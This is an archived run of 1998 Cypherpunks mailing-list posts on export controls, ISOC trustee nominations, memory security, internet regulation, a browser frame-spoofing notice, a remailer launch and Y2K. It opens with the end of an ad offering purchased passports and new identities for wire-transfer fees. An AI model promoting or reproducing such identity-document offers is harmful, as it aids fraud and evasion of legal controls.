 Docs legalized,notarized & registered: YES - IN ALL THE RIGHT COMPUTERS, REGISTRATION, LEGAL STAMPS, ETC.
 Dual nationality permitted:  YES
 Residency possible:          YES
 Extradition legally possible:DEPENDS ON YOUR FIRST NATIONALITY. EXTRADITON IS BETWEEN GOVT. TO GOVT. AGREEMENTS
 New identity/name change possible:YES (additional USD 5,000)
 Birth Certificate included:  NO, AS THIS IS BY NATURALIZATION
 Double taxation agreements:  DEPENDS AGAIN ON GOVT.-TO-GOVT. AGREEMENTS
 Travel opportunities:        EXCELLENT - AS GOOD AS ANY SWISS OR CANADIAN PASSPORT!
 List of visa requirements:   SEE BELOW
 Fee:                         US$ 10,000
 Time frame:                  appr. 2-3 weeks after receipt of application & funds

            Fee for spouse: SAME AS FOR HUSBAND 
 Fee for children under 18: DEPENDS 
  Fee for children over 18: SAME AS FOR ADULT 
        Photo requirements: 6 PHOTOS IN COLOR, showing the ears, no earrings or glasses
				    4 Photos in color for Cedula and Driver's License	

If you opt for name change, I do not need a copy of your current passport!

Nica:

same as above, except the following changes:

travel opportunities: 		more limited, still working on a comprehensive visa list, difficult to get! Best advise is to check with your local airline, and ask them how visa requirements are for Nicaraguaians to travel to your favorite countries

Fee: USD 7,500

Photo requirements: same

If you opt for name change, I do not need a copy of your current passport!

6. Terms:

Payment shall be 50 % deposit and the balance on delivery in 2-3 weeks. This includes delivery by courier worldwide, if personal delivery is requested, the client must bear with the additional costs. If interested, please inquire for the wire instructions, payments by wire transfer only.

7. Misc:

THESE ARE NOT CHEAP FAKES!! This deal is possible based on long lasting personal relationships and donations to political groups. There is no intermediary in between, I do it myself!!

8. How to order:

Please respond to privacy@privacy-consultants.com, I will give you:
- the application form
- the wire instruction
- the address where to mail the photos

Please bear in mind that this offer expires on Dec 31, 98. After that date prices will go up, some 60%!!

Don't loose any more time now and reply asking me for the application form.

Cordially

Dr. Georg Adem


************************************************************************

"One person with a belief is equal to a force of ninety nine
		   who only have interest."


"In the land of the blind the one-eyed is king, until the other 
           find out he can see. Then they kill him"


Our home page: http://privacy-consultants.com/
or full mirror at: http://nauru-banker-net.com/

email to: assistant@privacy-consultants.com
-------------------------------------------------------------------------
Our affiliated site: http://www.1-trust.net/ or: http://onetrust.net/
providing top-notch offshore services, credit cards, etc.

email to: quest@1-trust.net


                    WE SELL PRACTICE, NOT THE THEORY!
*************** Providing Privacy Consultancy Since 1978 ****************

We strongly encourage encryption!! Here you get our public key:
      
        http://privacy-consultants.com/pgpkey_home.html



P.S.: Last, but not least: Don't get fooled by cheap imitators, I saw what they deliver, and it is just not worth the paper it was printed on, at some back yard printer shop in Guatemala City! Stay with the person whom you can trust if it comes to passports, I know the ropes of this business better than anybody else! 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>x@z.wyx
Date: Mon, 30 Nov 1998 02:43:15 +0800
To: cypherpunks@Algebra.COM
Subject: "Export" controls
Message-ID: <199811291808.TAA01251@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



A few speculations on export controls.

As we all know, the concentration of so-called hard crypto is the same
inside and outside US borders. Or, for that matter, inside and outside
"free world" (heh heh) borders. I would even say that anyone with a
computer and net link in the world has about equal access to the crypto
software. And no one I know ever bothers do download anything from
US-based sites with those somnambulistic export-control buttons - it is
so much simpler do download it from somewhere else.

If we put aside the theory of deranged government, what logic can
explain this situation ?

Effective domestic crypto regulation.

Export farce is just a neat way of scaring companies and individual
contributors from developing and providing cryptographic systems within
US. Export regulations are the new high point of double-speak. Anyone
providing domestic crypto runs the risk of violating EARs.
Manufacturers are ultimately responsible when their products end up
overseas, and there is nothing in EARs that absolves them from that
responsibility.

[ For example, try to buy one of IBM crypto-cards - give them a call
and ask what does it take to purchase one with hard crypto on it
(semi-hard - they stop at 3DES) ]

Regular sales channels are closed for crypto today in US. No one dares
sell crypto hardware to anonymous public. No one dares to post crypto
software for US customers to download with a single-click. Small
developers (like that guy from Sunnyvale) are harassed with subpoenas.

The end result is a tremendous slow down of crypto systems distribution
in the US. Which was the intent.

Now the question: is there a way to build a case which will bring down
crypto export controls because they demonstrably prevent DOMESTIC sales
and therefore constitute DOMESTIC restrictions. Say, if company
starts selling some hard crypto products in a storefront for cash only
- how would BIX react ? Would a US citizen have to produce ID in order
to buy ?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: registration@evguide.intervu.net (eyeQ Registration)
Date: Mon, 30 Nov 1998 12:57:19 +0800
To: cypherpunks@EINSTEIN.ssz.com (Joe Cypher)
Subject: eyeQ Signup (SID=2e4628740b7a7d730a7f6d783e3a10)
Message-ID: <199811300424.UAA11343@evguide.intervu.net.>
MIME-Version: 1.0
Content-Type: text/plain



To complete the registration process, please reply to this e-mail.
Make sure that "SID=2e4628740b7a7d730a7f6d783e3a10" appears somewhere
in the subject line.

Thank you for using eyeQ!

eyeQ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Mon, 30 Nov 1998 13:55:23 +0800
To: cypherpunks@toad.com
Subject: Internet Society: 1999 Board of Trustees Call for Nominations
Message-ID: <199811300505.VAA00944@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



I'm currently serving a 3-year term on the Board of Trustees of the
Internet Society, and have volunteered for the nominations committee.
The board is elected by the membership; every year five or six
Trustees are elected to three-year staggered terms.  I would like to
see talented people who care about the future of society serve on the
board.  I know there are many such among the cypherpunks.  If you are
willing to serve on the Board, please nominate yourself, or if you
know someone who's willing to serve and who you think would be good,
please nominate them.  Send such nominations to isoc-noms@isoc.org.
The message below gives all the details.

Not everyone nominated will be on the ballot; the nominations
committee will winnow it to a list of ten or fifteen people.  And
among those people, only the top five vote-getters will be elected by
the membership.

Anyone who the nominations committee doesn't pick for the ballot, can
get on it anyway, if they submit a petition from 65 Internet Society
members to put their name on the ballot.  That's how I got on the
ballot when I was elected a few years ago.  (IETF is a great place to
run around and get people to sign your petition.)

Being a Trustee makes you responsible for the acts of the Internet
Society.  And you get to help decide what those acts will be.  It's an
unpaid, volunteer job.  You get to fly (at your own expense) to the
board meetings a few times a year.  ISOC has done many good things,
like training people in a hundred countries how to set up the first
Internet node there.  Like publicly stating (in RFC 1984) that it will
ignore US export controls when designing worldwide Internet crypto
protocols.  Like working hard to resolve the mess around domain-name
and IP-address administration, and the mess around the "Internet"
trademark.  ISOC also provides the organizational structure for the
IETF and the Internet Architecture Board.  ISOC will probably do many
more good things -- particularly if it has good people as Trustees!

Whether or not you want to be a Trustee, I encourage you to join the
Internet Society as a member -- see http://www.isoc.org/isoc/membership/

	John Gilmore

Message-ID:  <3.0.5.32.19981118080715.00927100@pop.isoc.org>
Date:         Wed, 18 Nov 1998 08:07:15 -0500
From: Internet Society <members@ISOC.ORG>
Subject:      1999 Board of Trustees Call for Nominations

1999 Internet Society Board of Trustees Elections

Call for Nominations

On 26 February 1999, ballots will be posted for the election of new Internet
Society Trustees. Election Day is scheduled for 3 May 1999, when received
ballots will be opened and tallied. Internet Society members will be asked
to elect FIVE Trustees who will serve  three year terms. The role of a
Trustee is detailed in the Internet Society By-Laws (not included in this
notice but available on the Internet Society web server):

        http://www.isoc.org/trustees/


This notice is a call from the ISOC Nominations Committee for nominations
of candidates for election.

Nominations are to be forwarded to this committee via:

 -  electronic mail to: isoc-noms@isoc.org
 or
 -  fax to  +1 703 648 9887
 or
 -  postal mail to:

Internet Society
12020 Sunrise Valley Drive, Suite 210
Reston, VA 20191-3429
U.S.A.

Attention: 1999 Nominations Committee

Nominations are to reach the committee no later than 17 December 1998 in
order to ensure due consideration of the nomination by the committee.
Nominations (in the form of agreed nominations, suggestions or volunteers)
are to include the name of the nominated individual, contact details and a
brief explanation of the basis of the nomination.

The  committee will confirm with the candidates their willingness to stand
for election as a nominated candidate if so selected. Nominees will also be
requested to provide the committee with further personal details (in the
format of a curriculum vita) as they relate to the selection guidelines
that are to be applied by the committee, and provide to the committee a
statement indicating their willingness and ability to devote an appropriate
level of time to activities associated with the position of Trustee of the
Internet Society.

It is intended that the committee's selection process will result in 10
candidates for election as nominated candidates.  This list will  be passed
to the Elections Committee on 19 December 1998, as well as informing voting
members of the Society of the selected nominees.

Additional candidates for election to the Board of Trustees may be
nominated by membership petition, filed with the Chair of the
Nominating Committee no later than 22 January 1999.  A petition for
the 1999 election will require the signatures of sixty-five voting
ISOC members (1% of the total voting members). Specific details of the
petition process will be included in the announcement of nominated
candidates on 19 December 1998.

Following the closure of the petition period, the list of the nominated and
petitioned candidates will be announced 29 January 1999.

The Election Committee will mail the ballots out to ISOC voting members on
26 February 1999 and the election date is set to be 3 May 1999.

Sincerely,

Kees Neggers
Chair, ISOC Nominations Committee
Kees.Neggers@SURFnet.nl
tel: +31 302 305 305
fax:  +31 302 305 329
------------------------------------------------------------------------

A. The 1999 ISOC Nominations Committee membership

1. Kees Neggers, Netherlands<Kees.Neggers@SURFnet.nl>
2. John Gilmore, US<gnu@TOAD.COM>
3. Jun Murai, Japan<jun@WIDE.AD.JP>
4. Leni Mayo, Australia<leni@moniker.net>
5. Steve Wolff, US<swolff@cisco.com>
6. Kim Claffy, US<kc@sdsc.edu>
7. Jill Foster, UK<Jill.Foster@newcastle.ac.uk>

Committee Email address:     isoc-noms@isoc.org
------------------------------------------------------------------------

B. Nominations Committee Selection Guidelines

Candidates for ISOC Trustee should have a demonstrable involvement in the
Internet. Such involvement may range from  participation as a technology
developer, researcher, user, network operator, policy maker (e.g. in
government), sponsor of research and development. ISOC is interested in
broadly-based representation on the Board of Trustees and seeks to identify
candidates from industry, education and non-profit sectors and from
government. The selection criteria will be directed to selecting a broad
range of interests, and will include criteria of regional location, current
activities, relevant experience and professional background.

Ten candidates will be selected by this committee, using the criteria as
outlined above.

------------------------------------------------------------------------

C. A Profile of the current Board of Trustees

"#" marks board positions that are expiring.
"&" marks board members who have indicated that they will not or cannot be
candidates for re-election.

The current membership (as of 1 November, 1998) of the Board of Trustees is
as follows:

#&Scott Bradner         1993-1999   USA      <sob@harvard.edu>
Vint Cerf            1992-2001   USA      <vcerf@mci.net>
#&Susan Estrada         1993-1999   USA      <sestrada@aldea.com>
#&David Farber          1993-1999   USA      <farber@cis.upenn.edu>
John Gilmore          1997-2000   USA      <gnu@toad.com>
Christian Huitema    1995-2001  France   <huitema@bellcore.com>
Geoff Huston    1992-1995, 1998-2001 Australia <gih@telstra.net>
Christine Maxwell     1997-2000   France   <maxwell@chiliad.com>
Jun Murai             1997-2000   Japan    <jun@wide.ad.jp>
Kees Neggers    1992-1996, 1998-2001 <Kees.Neggers@SURFnet.nl>
Tim O'Reilly         1995-2001   USA      <tim@ora.com>
Jose Luis Pardos      1997-2000   Spain    <104056.110@compuserve.com>
#George Sadowsky       1996-1999   USA      <george.sadowsky@nyu.edu>
Ben Segal             1997-2000   Suisse   <B.Segal@cern.ch>
#Vacancy
Donald Heath          Ex-officio  USA      <heath@isoc.org>

------------------------------------------------------------------------

D. Procedures for Nomination and Election of Trustees

1. Trustee Positions to be Filled

The Board of Trustees will advise the Nominating Committee of the number of
Trustee positions to be filled by vote of the individual members at each
annual election.  The Board may also advise the Nominating Committee of its
desires with respect to the backgrounds of individuals to be nominated in
order to achieve the balance of experience and qualifications required by
the provisions of By-Law Article III, Section 2, which provides that "the
Board shall seek to have among the Trustees representative individuals from
industry, from educational and nonprofit organizations and from government."

1.1  Date of Election

The Board of Trustees will annually adopt a timetable for Trustee
elections.  The election date shall be not less than 40 days prior to the
next Annual Meeting of the Society.

1.2  Use of Electronic Mail

All communications concerning the nomination and election of Trustees shall
be in the form of electronic mail except the ballot, which shall be in the
form of first class postal mail
or FAX.  Members of the Society who are not reachable by electronic  mail
may participate in the nomination process by postal mail or  FAX.

2.  Nominating Committee

The Board of Trustees will annually appoint a Trustee Nominating Committee.
The Nominating Committee will consist of  7 individual members of the
Society, 5 of whom shall constitute a valid quorum.  The Chair of the
Nominating Committee shall be a  member of the Board of Trustees.  At least
2 members of the  Nominating Committee shall be individual members of the
Society  not currently serving in any elected or appointed capacity in the
Society.

2.1  Nominations by Committee

The Nominating Committee will notify the members of the Society of the
procedures for nominating individuals for election to the Board of
Trustees, and will provide a minimum period for receiving nominations of 30
days.  The number of individuals nominated shall exceed the number of
Trustees to be elected.

2.2  Nominations by Petition

The Nominating Committee will notify the voting members of the Society of
the names of individuals nominated by the committee for election to the
Board of Trustees not less than 105 days prior to the date established for
Trustee elections.  Additional nominations for election to the Board of
Trustees may be made by petition filed with the Chair of the Nominating
Committee not less than 75 days prior to the election.  Petitions may be
filed electronically.  The Nominating Committee shall specify the number of
signatures of voting members required for petitions, which shall be at
least fifty voting members of the Society, or 1% of the total number of
voting members of the Society, whichever is greater.

2.3  Candidates for Election

The Nominating Committee will provide the names of a completed slate of
candidates for election to the Elections Committee not less than 74 days
prior to the election date.

3.  Elections Committee

The Board of Trustees will annually appoint an Elections Committee composed
of three voting members of the Society which will be responsible for
establishing and supervising elections. The Chair of the committee shall be
a Trustee whose term of office does not expire during the year of the
election.

3.1  Eligibility to Vote

All individual members of the Society in good standing are eligible to
vote.  An individual member is in good standing if his or her annual dues
are not more than 60 days past due on the date of mailing of the ballot.

3.2  Ballot

The Trustee election shall be conducted by written ballot of the individual
members, which shall be mailed to each member of the Society in good
standing not less than 60 days prior to the date of the election.

3.3  Voting

Each voting member will be entitled to as many votes as there are Trustee
positions to be filled by vote of the members.  Votes may be cumulated on
behalf of one or more candidates for election.  A member may use fewer than
the total number of votes available if he or she so chooses.

3.4  Receipt of Ballots

All ballots for Trustee elections shall be received by the Chair of the
Elections Committee by 5 PM local time on the day prior to the date of the
election, at the place established by the Elections Committee for delivery
of the ballots.

3.5  Counting of Ballots

The counting of ballots will take place on the election date, at a time and
place established by the Elections Committee.  At least two members of the
Elections Committee shall be present at the counting of the ballots.  The
committee will establish procedures to ensure the privacy, validity and
accuracy of all ballots.

3.6  Certification of Vote

The Elections Committee shall certify the results of the annual Trustee
election to the Board of Trustees within 10 days following the election,
forwarding a list of the candidates and the number of votes each candidate
has received.

3.7  Challenges

No challenge to any Trustee nomination or election procedure or result may
be brought except by an individual member in good standing.  Any challenge
must be addressed to the President of the Society with a recital of the
reasons for the challenge, and must be received within 20 days of the
election date.  The President, after consultation with the Chairs of the
Nominating and Elections Committees and the members of the Board of
Trustees, shall advise the author of the challenge of the Board's decision,
which shall be final, within 40 days of the election date.
------------------------------------------------------------------------

1999 ISOC Nomination and Trustee Election Committee Timetable

    November 17, 1998  . Nominations Period Opens
    December 17, 1998  . Nominations Period Closes
    December 19, 1999  . Nominations Committee Announcement
    January 22, 1999 . . Petition Period Closes
    January 29, 1999 . . Candidate Announcement
    February 26, 1999  . Ballots Posted
    March 1, 1999  . . . Election Period Opens
    May 3, 1999  . . . . Election Date
    May 3, 1999  . . . . Challenge Period Opens
    May 13, 1999 . . . . Elections Committee Certifies Result
    May 23, 1999 . . . . Challenge Period Closes
    June 12, 1999 . . . . ISOC Response to Challenge Period Closes
    June 21, 1999  . . . ISOC Board of Trustees Annual General Meeting

------------------------------------------------------------------------

F. Assumption of Office of Elected Trustees

The term of office of elected Trustees shall commence at the adjournment of
the next Board meeting following the completion of the election process.
The term of office for departing Trustees shall end at the adjournment of
the next Board meeting following the completion of the election process.
The Board meeting is defined as having one agenda, which may extend over
several days. The new Board may convene an organizational meeting after the
completion of the meeting of the outgoing Board.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 30 Nov 1998 12:12:17 +0800
To: Cypherpunks Distributed Remailer <cypherpunks@EINSTEIN.ssz.com>
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <199811281827.MAA04760@einstein.ssz.com>
Message-ID: <3.0.5.32.19981129212227.008e9440@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Jim Choate wrote: 
>> If I had 2 of the Samsung 4G memory modules w/ battery back-up 
>> I could run an entire machine without a hard-drive.

Yeah - it can be quite nice to do that, both for security and speed.
Hugh Daniel's done some work on making Unix run on systems with 
read-only root drives - there are some SCSI drives which support
read-only mode again, and there are PCMCIA flash cards which have
write-protect switches and look like disks to the OS, 
so you can set them up the way you want and then go to read-only.

Not as many choices if you're running Microsoftware instead
of an operating system, though PCs give you some way to 
fake things out.  

At 11:26 PM 11/28/98 +0000, Frank O'Dwyer wrote:
>If you had no hard drive why the hell would you worry about disk
>swapping?

You need to jumpstart the machine somehow, and unless you 
burn the OS into PROMs, the easiest way is disk drives.
On the other hand, if Win9X wants to swap something to disk,
and there's no disk there, it could get pretty grouchy.

A long time ago, when disks and memory were both more expensive,
one of the memory companies (Kingston?  EMC?) made some SCSI boxes
with lots of memory in them, so the operating system doesn't
need to know that it's silicon and not rotating metal.
They also had UPS battery backup in them.
FSCK sure goes faster when you don't need to wait for mechanicals.
Some PCMCIA memory cards today just look like more RAM;
others can look like disks.


				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 30 Nov 1998 12:18:26 +0800
To: Jim Choate <cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Securing data in memory (was "Locking physical memory (fwd)
In-Reply-To: <199811281744.LAA04641@einstein.ssz.com>
Message-ID: <3.0.5.32.19981129221723.008e9950@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:44 AM 11/28/98 -0600, Jim Choate wrote:
>My mistake. Since it really does only handle individual apps it's 
>of limited utility in the Windows world because of the numerous ways 
>to get system level access.   [....]
>Considering that this doesn't prohibit apps from getting access to that
>memory, it only prohibits that memory page from being written to disk, it
>has limited utility. It's only real protection is against disk scans.

Sure; it's only trying to do a limited scope of security protection.
Trying to protect an entire Win95/98 system is a much bigger job
(about like trying to keep water in an upside-down sieve :-)
Even running entirely in RAM doesn't prevent applications from
stealing keystroke, or stealing each others' RAM, or
crashing the graphics subsystem, or hosing the network.

Windows NT, under some limited circumstances, has been rated C2 Orange Book,
but that only means you can't steal most things without creating
a log file entry.   Don't expect Win95/98 to be something it's not.

>No, it wouldn't. The question of swap or virtual space is one of economics
>and not computer architecture. If it were economicaly feasible there would
>be no drives just fast main ram.

Computer architecture is _always_ a technical and economic tradeoff.
Why not just run everything out of Level 1 Cache or registers?
Disk drive makers keep making faster, cheaper, bigger drives,
DRAM makers keep making DRAM faster, cheaper, and bigger,
blazingly-fast SRAM makers keep making SRAM blazinglyer,
in-between technology makers keep making flash ram and bubble memory
in-betweener, bus makers make busses faster, etc.,
and the whole mess keeps evolving together.

Back in the mid-80s, Princeton University got some SDI money for the
Massive Memory Machine Project, researching what you could do if
you had enough memory for anything you wanted.  Even with the
CS approaches of the time, you'd do a lot of things differently.
Their non-massive toy machine was a 1.5MIPS VAX with 128MB RAM -
which took 10 extension racks to hold all the RAM.
These days 128MB is cheap, as are 500 MIPS P2s, but 50GB of RAM
is still bigger than most machines' busses will hold,
and even 2GB of DRAM is a lot bigger and more power-hungry than
most laptops can really support, much less 2GB of fast SRAM.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Mon, 30 Nov 1998 11:54:47 +0800
To: Cypherpunks <cypherpunks@cyberpass.net>
Subject: Net control attempted at the local level (Va.)
Message-ID: <36620EED.954CB5D8@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


A couple of recent Washington Post articles demonstrate Virginia's attempt
at internet regulation. A case of restricting access to internet sites
by public libraries in Loudoun Co. was ruled against by a federal court:
http://search.washingtonpost.com/wp-srv/WPlate/1998-11/27/020l-112798-idx.html

A copy of the ruling:
http://www.techlawjournal.com/courts/loudon/81123op.htm
 
 

Virginia's governor, James Gilmore III, has appointed a commission on
internet technology to recommend policies on guiding internet business
and protecting internet users. Guidelines are touted by state officials
as being the first in the nation to *protect* residents. Ratification of
the recommendations is scheduled to take place at the College of William
and Mary on wednesday, Dec. 2, 1998.
http://www.washingtonpost.com/wp-srv/WPlate/1998-11/29/216l-112998-idx.html

Draft agenda of the meeting to be held on Dec. 2, titled "The State's
Role in Responsible Internet Growth", is at:
http://www.sotech.state.va.us/intagend.htm
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Information Security <guy@panix.com>
Date: Mon, 30 Nov 1998 12:03:59 +0800
To: cypherpunks@cyberpass.net
Subject: Re: SIGH... NOT!! THC tainted oranges
Message-ID: <199811300337.WAA02625@panix7.panix.com>
MIME-Version: 1.0
Content-Type: text/plain



   >   From: "Dr.G" <drg@pgh.org>
   >
   >   I would certainly appreciate some pot.

You need something stronger to ease the pain of being Grubor.

   >   You use pot for medicine too, and the local supply
   >   in nil.  I may have to drive to the big Apple.

Sorry, you've been sentenced to life in Pittsburgh.
---guy

   Boo hoo hoo


> YOUR SEARCH REQUEST IS:
>  JOHN GRUBOR
>
>                   1ST STORY of Level 1 printed in FULL format.
>
>                              Copyright 1982 U.P.I.
>
>                       March 31, 1982, Wednesday, AM cycle
>
> SECTION: Regional News
>
> LENGTH: 129 words
>
> DATELINE: PITTSBURGH
>
> BODY:
>    A disbarred Butler County attorney who admitted stealing $28,000 from a
> client was sentenced to up to 23 months in prison Wednesday by an Allegheny
> County Common Pleas Court judge.
>
>    John Grubor, 36, of Butler, broke down and cried after Judge Robert E.
> Dauer imposed the 11-to-23-month prison term to be served at the state
> Correctional Institution at Greensburg, Westmoreland County.
>
>    The judge also ordered that Grubor spend five years on probation after
> completing the prison sentence.
>
>    Grubor pleaded guilty last month to one count of theft by failure to
> make required dispostion of funds entrusted to him. He admitted he bilked a
> client out of $28,000 in a workmen's compensation settlement.
>
>    The state Supreme Court disbarred Grubor as a result of the theft.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Mon, 30 Nov 1998 12:26:56 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Net control attempted at the local level (Va.)
In-Reply-To: <36620EED.954CB5D8@shentel.net>
Message-ID: <366217D6.CE665406@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain


Developing Internet Policy for Commonwealth, the first comprehensive state
internet legislation anywhere in the nation:
 http://www.sotech.state.va.us/102898.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 30 Nov 1998 13:06:56 +0800
To: Declan McCullagh <cypherpunks@cyberpass.net
Subject: Re: Fwd: FC: EU eavesdropping on Iridium satellite phone system
In-Reply-To: <199811280332.TAA02042@smtp.well.com>
Message-ID: <3.0.5.32.19981129233444.008ea910@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hugh Daniel and various other people have commented (or ranted :-)
about the difference in wiretap capabilities between satellite systems
that do space-to-space relay connections for user-to-user calls and
systems that always include a ground segment even if it's not needed,
and which move traffic mostly on the ground instead of in space.

The primary reasons for doing this have been to reduce interference
by government PTTs or other monopoly telecom providers who get
a cut of the financial action this way, but it also makes the
system accessible to every wiretap-happy police force whose
territory the terrestrial segment passed through,
and the US government has probably been one of many players
trying to maximize government access.


At 10:21 PM 11/27/98 -0500, Declan McCullagh wrote:
>any reactions? some of my newspaper colleagues are thinking of writing
>about this...
>>---------- Forwarded message ----------
....
>>As a Europol internal document obtained by Telepolis shows, 
>>massive attempts on the part of European police forces are 
>>underway to acquire the ability to eavesdrop on the Iridium system, 
>>currently in a sensitive stage of expansion. 
....
>>http://www.telepolis.de/tp/english/inhalt/te/1667/1.html

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Mon, 30 Nov 1998 13:48:02 +0800
To: cypherpunks@cyberpass.net
Subject: Frames security hole
Message-ID: <3.0.5.32.19981130001506.008e9e40@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



	------------------------------
	Date: Fri, 20 Nov 1998 12:27:16 +0000 (GMT)
	From: Lindsay.Marshall@newcastle.ac.uk
	Subject: Frames security hole

	There is a description and demo of a security hole with frames in web
	browsers at http://www.securexpert.com/framespoof/start.html - there is
	a version that works without javascript enabled as well.

	http://catless.ncl.ac.uk/Lindsay
	------------------------------

I checked it out, and it's way cool.  You open some frame-using target page,
such as www.citibank.com, in Netscape or Internet Exploder,
and cliok on their hack, and a new frame appears on the target page,
replacing some frame that belonged there.  They say they can fake out
Netscape's "key" icon that claims that an https: page is secure,
though I didn't have any handy frame-based https pages to test with.

Technical Discussion: http://www.securexpert.com/framespoof/tech.html
Some defenses http://www.securexpert.com/framespoof/defense.html
==> but the rel defense is getting your browser vendor to fix the browser.
Meanwhile, don't trust any web page with frames with any
information you care too much about.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@dragoncon.net (dctest Anonymous Remailer)
Date: Mon, 30 Nov 1998 13:29:20 +0800
To: cypherpunks@cyberpass.net
Subject: dctest remailer - remailer@dragoncon.net
Message-ID: <199811300459.XAA05002@inferno.serversystems.net>
MIME-Version: 1.0
Content-Type: text/plain



A new remailer will be up for the next two weeks.  This is an attempt to
play with and test the Win95 Reliable remailer software available at
ftp://ftp.efga.org/privacy

remailer@dragoncon.net is a Cypherpunk Type I remailer w/o Mix, which uses
RSA keys.  The operator had problems getting the later key types to work
properly.  Please send comments about the configuration and operation to
admin@dragoncon.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Martinus Luther" <martinusl@hotmail.com>
Date: Mon, 30 Nov 1998 22:06:00 +0800
To: cypherpunks@cyberpass.net
Subject: y2k/gary north delusions
Message-ID: <19981130131031.26101.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain



VNZ quoted Gary North:

>  Astronomy is a precise science.  It can predict
>  events such as this one with remarkable accuracy.
>  The astronomers do not know how intense this
>  shower will be, but they know for certain that tonight
>  will be the highest density night. 

Actually they were 10 or 12 hours out - which 
in Europe at any rate had the effect that the 
highest density night was't the one predicted :-)

But I agree with you. This whole apocalyptic take on the thing is 
(almost certainly)  wrong. (Of course that doesn't mean you shouldn't 
prepare for it... if you honestly thought that spending a few hundred 
dollars could save you from a 1% chance of death, you'd probably do it. 
If the 99% turns out to be true what have you got - a year's supply of 
baked beans & sardines in tomato sauce)

Computers will crash - or rather more seriously  applications will 
produce bad results, this is much more an application problem than an OS 
problem - in fact things are already going wrong. But it won't happen 
all in one big bang on the 1st of January. Things will get slowly worse 
for the next year, the rate of problems will go up, more people will be 
knocking up quick-and-dirty work-arounds and fewer people working on new 
projects. North looks at it as a programming problem - but it's not,  
not when it actually hits,  it then becomes ann operations problem. And 
operators, system programmers & system administrators are used to 
working with computer systems that don't work. They do it every day. And 
the peopel who rely on computer systems are used to working when they go 
down. And if they aren't there are all those middle-aged middle-managers 
they laid off in the downsizing who can come back and show them how it 
used to be done. 

There will be hassle and hard work and very possibly a depression. But 
there is very, very unlikely to be the kind of catastrophic failure that 
North seems to long for.

And even if it does fall out that way, he's wrong about cities as well. 
We *know* cities survive a hell of a beating, we saw it again and again 
in WW2. (Take a look at  a picture of Hamburg in August 1943. They 
rebuilt that. Themselves, starting the day after)   The complete 
physical destruction of the infrastructure of a city does not kill a 
city.  A city is made of *people*, not buildings. People with the skills 
that make cities work, and people who - just because they are in a city 
- need to get along to make cities work. 

If all our big systems go down we will rebuild them. And what's more 
we'll rebuild them quickest in the big cities, because it's the big 
cities that have the concentration of people with the skills, and 
perhaps more importantly, the motivation to rebuild them.

(Anyway, despite North, in the event of a complete collapse of business 
and government probably the worst place to be is the outer suburbs. You 
need fuel to get around (in the inner cities everything is close by). If 
there are refugees from cities they have to pass through the suburbs - 
and there is a lot more to steal there than there is on the open 
countryside & a lot fewer people to stop you than in the city centres.)

*Real* rural life will continue of course, because people have the land 
and the skills to use it. And becauwse they tend to have stores. I don't 
know if it would be a very prosperous rural life for most people in the 
"developed" parts of the world though. I wonder what the sudden 
withdrawl of pesticides, herbicides, fertiliser, & fuel to fly the 
crop-sprayer would do to yields on the average American industrial farm? 
If the year 2000 is half as bad as North says it will be there will be a 
massive change in the balance of economic power away from North America 
and towards the so-called Third World. 

It looks like Gary North isn't really interested in the year 2000 
problem. What he is interested in seems to be guns. He's latched on to 
this issue because it allows him to think and write more about guns. 
And, like so many other gunwankers he seems to get off fantasising about 
the total collapse of civil society because that way he gets to feel 
good about his guns. All this obession with death and destruction is a 
bit strange in someone rumoured to be a Christian.

Of course where I am in London it's all academic. The nearest genuine 
open country is maybe 150 miles  away, in a different nation, on the 
other side of the Channel. Most of what passes for countyside in the 
south of England is really exurbia, a sort of huge extended suburbia got 
up to look rural. Less than one percent of the population actually works 
on the land. We have more computer programmers than farmers. Most people 
in London have never even met a farmer. If it all falls over we will 
just have to put it back up again because there is no-where else to go.

Hey, maybe North is right about the USA. Maybe all the programmers will 
leave town to starve in the country. Maybe the systems will never get 
fixed. Maybe heavily armed gangs will take over the cities.  Maybe you 
never will rebuild your civilization.  I hope not. But if it does turn 
out that way we'll send you some foreign aid.


______________________________________________________
